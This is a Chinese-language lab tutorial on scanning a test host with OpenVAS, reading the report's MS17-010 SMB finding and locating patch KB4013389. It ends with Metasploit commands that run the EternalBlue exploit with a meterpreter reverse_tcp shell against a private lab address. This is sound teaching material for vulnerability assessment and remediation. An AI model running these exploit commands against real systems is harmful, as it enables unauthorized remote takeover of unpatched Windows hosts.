使用OpenVAS进行漏扫

关于OpenVAS的下载和安装请移步​​web安全day40:最新版OpenVAS的安装配置 ​

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_服务器

新建扫描目标

开始进行扫描的时候需要新建一个目标。点击Configuration---Targets,点击新建。

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_服务器_02

配置扫描策略

查看扫描模板,就是在扫描过程中使用的扫描策略和配置,这个扫描模板一般保持默认,也可以自己配置。

填写好相关信息,点击Create

创建好的目标如下:

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_服务器_03


创建扫描任务

创建好目标后,需要创建扫描任务。

点击scans--tasks,新建任务。

填写好相关信息,名称自定义。扫描目标要选择之前我们配置过的,会以下拉列表的形式展现。

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_OpenVAS_04

创建好的扫描目标如下:

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_MS17-010_05

开始扫描

点击开始按钮开始扫描。

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_扫描_06

状态变成了requested--完成状态。

扫描完成

扫描结束后,显示已经完成。

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_扫描_07

点击任务状态,可以查看扫描结果。

扫描报告导出

可以将扫描结果以报告的形式保存下来,点击test1打开扫描详细信息,点击最上方的download下载报告,这里报告格式自选。

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_metaspliot_08

下载好的报告如下。

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_OpenVAS_09

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_metaspliot_10


对于漏*洞,我们主要关注以下内容

*洞名称:微软Windows SMB服务器多个漏*洞 - 远程 (4013389)

*洞风险等级:高危(HIGH)--中危(MEDIUM)--低危(LOW)--信息泄露

优先级

描述

修复建议

该评级是针对未经身份验证的远程攻*击者可以轻松利用并导致系统受损(任意代码执行)而无需用户交互的漏*洞。此类漏*洞通常为蠕虫、勒索软件等利用的漏*洞。

该漏*洞需尽快修复。

该评级适用于潜在可能危及资源的机密性、完整性或可用性的缺陷。此类漏*洞通常为暂无法真实可利用,但官方或互联网上披露的评级较高漏*洞,建议持续关注。

该漏*洞可延后修复。

该评级适用于能被成功利用可能性极低或者成功利用后无实际风险的漏*洞。此类漏*洞通常是程序源代码中的BUG缺陷,以及对合规场景和业务性能有影响的漏*洞。

该漏*洞暂可不修复。

*洞描述:‎Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Server Message Block(SMB)Server是其中的一个为计算机提供身份验证用以访问服务器上打印机和文件系统的组件。 Microsoft Windows中的SMBv1服务器存在远程代码执行漏*洞。

*洞危害:远程攻*击者可借助特制的数据包利用该漏*洞执行任意代码。以下版本受到影响:Microsoft Windows Vista SP2,Windows Server 2008 SP2和R2 SP1,Windows 7 SP1,Windows 8.1,Windows Server 2012 Gold和R2,Windows RT 8.1,Windows 10 Gold,1511和1607,Windows Server 2016。

修复建议

修复

通过​​信息安全漏*洞门户  ​​可以获得cve和cnnvd的对应关系。​

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_MS17-010_11

在​​国家信息安全库​​中可以进一步查看并且获得补丁信息。

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_metaspliot_12

点击补丁获取链接。

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_metaspliot_13

这里Microsoft知识库文章4013389所对应的补丁就是KB4013389.

实验一:以445端口为例理解MS17_010

我们通过OpenVAS扫描得出我们的目标主机开启了445端口,445端口是用于微软的文件共享SMB服务。我们知道,永恒之蓝可以根据445端口得到系统最高权限。

我们进行测试。

使用MSF针对445进行测试

关于MSF+MS17_010的测试方法可移步​​渗*透测试:metasploit+ms-17-010+Windows2008r2​

msfconsole

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_服务器_14

msf6 > search ms17-010

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_服务器_15

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS 192.168.189.153
set LHOST 192.168.189.141
exploit

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_metaspliot_16

getuid

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_服务器_17

shel

#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_MS17-010_18



#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复_metaspliot_19